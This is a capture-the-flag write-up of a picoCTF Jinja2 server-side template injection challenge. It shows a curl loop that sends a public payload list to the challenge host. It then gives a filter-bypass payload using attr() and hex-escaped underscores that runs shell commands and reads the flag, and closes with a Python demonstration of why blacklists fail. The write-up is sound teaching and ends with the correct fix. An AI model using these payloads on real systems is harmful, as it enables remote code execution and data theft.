Challenge Overview
I made a cool website where you can announce whatever you want! I read about input sanitization, so now I remove any kind of characters that could be a problem :)
I heard templating is a cool and modular way to build web apps! Check out my website here!
Solution
This is similar to the last challenge, but submitting the usual payload, {{ cycler.__init__.__globals__.os.popen('cat flag').read() }}, or anything like it, only gets you this message: Stop trying to break me >:( The server is rejecting something in that payload; the working bypass below suggests it is the dots and double underscores.
So, looking for an easy workaround, you can just google SSTI payloads and come across this list: https://github.com/payloadbox/ssti-payloads
Put the payloads into a file, one per line, and you can try each of them in a loop. Use --data-urlencode rather than a plain -d here: otherwise characters such as +, & and % in a payload are interpreted as form syntax by the server instead of reaching the template engine as written:
while IFS= read -r line; do curl -sL --data-urlencode "content=$line" http://shape-facility.picoctf.net:51355/; done < payload.txt
However, the loop eventually times out, so the quicker route is to read through the list and test the promising payloads by hand. This one gets through the filter:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
That payload ran id and returned its output, so you have code execution. It works because |attr('name') replaces the dotted and bracket attribute access the filter is looking for, and \x5f is the hex escape for _ that Jinja decodes inside string literals, so the request body never contains a literal . or __. request|attr('application') resolves to a method on the request object; like any Python function it carries __globals__, whose __builtins__ entry exposes __import__, and __import__('os') gives you os.popen. Swapping id for ls lists the current directory:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls')|attr('read')()}}
That command shows this output:
__pycache__ app.py flag requirements.txt
Since the flag is a file called flag in the current directory, you can swap in the cat command to get the flag:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}
Flag: picoCTF{sst1_f1lt3r_byp4ss_8b53...}
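To see why the hex-escaped payload gets past a character blacklist, here is an added example (my own code, not the challenge's app.py, which we never get to see). The blacklist it models is an assumption: the page only shows the rejection message, so the exact rule the server used is unknown, and blocking ".", "__" and square brackets is just the rule that fits the observed behaviour. The decoding step mirrors what Jinja2's lexer does with string literals, which is to resolve backslash escapes the same way Python's unicode-escape codec does, so it shows the attribute names attr() actually receives after the filter has already let the request through.

```python
import re

# Assumed blacklist, modelled on the challenge's observed behaviour:
# the naive payload with dots and dunders is rejected, the escaped one is not.
BLOCKED_TOKENS = ("__", ".", "[", "]")

# The payload that the server rejects (from the writeup).
DIRECT_PAYLOAD = "{{ cycler.__init__.__globals__.os.popen('cat flag').read() }}"

# The bypass payload (from the writeup); raw string so the \x5f escapes stay literal,
# exactly as they travel in the HTTP body.
BYPASS_PAYLOAD = (
    r"{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')"
    r"|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')"
    r"|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')"
    r"|attr('popen')('id')|attr('read')()}}"
)


def naive_filter(template: str) -> bool:
    """Return True if the assumed blacklist would reject this template source.

    This is a substring check on the raw request body, which is all a character
    blacklist can ever see: it runs before the template engine parses anything.
    """
    return any(tok in template for tok in BLOCKED_TOKENS)


def decode_string_literals(template: str) -> list:
    """Return every single-quoted string literal in the template, decoded.

    Jinja2's lexer resolves backslash escapes inside string literals with the
    unicode-escape codec, so '\\x5f\\x5fglobals\\x5f\\x5f' becomes '__globals__'
    by the time attr() is called with it.
    """
    literals = []
    for match in re.finditer(r"'((?:[^'\\]|\\.)*)'", template):
        raw = match.group(1)
        decoded = raw.encode("ascii", "backslashreplace").decode("unicode-escape")
        literals.append(decoded)
    return literals


def smuggled_names(template: str) -> list:
    """Decoded literals that the blacklist would have rejected had it seen them.

    Non-empty output means the filter was bypassed: the forbidden tokens exist
    in the evaluated template even though they never appeared in the request.
    """
    return [name for name in decode_string_literals(template) if naive_filter(name)]


if __name__ == "__main__":
    print("direct payload blocked:", naive_filter(DIRECT_PAYLOAD))
    print("bypass payload blocked:", naive_filter(BYPASS_PAYLOAD))
    print("attribute chain seen by Jinja:", decode_string_literals(BYPASS_PAYLOAD))
    print("forbidden names that got through:", smuggled_names(BYPASS_PAYLOAD))
```

The lesson is that the blacklist inspects the request body while the engine inspects the decoded, parsed template, and those are different strings. The fix is not a longer blacklist; it is to never pass user input as template source at all, and to render it as a variable instead (in Flask, render_template_string("{{ content }}", content=user_input) rather than render_template_string(user_input)).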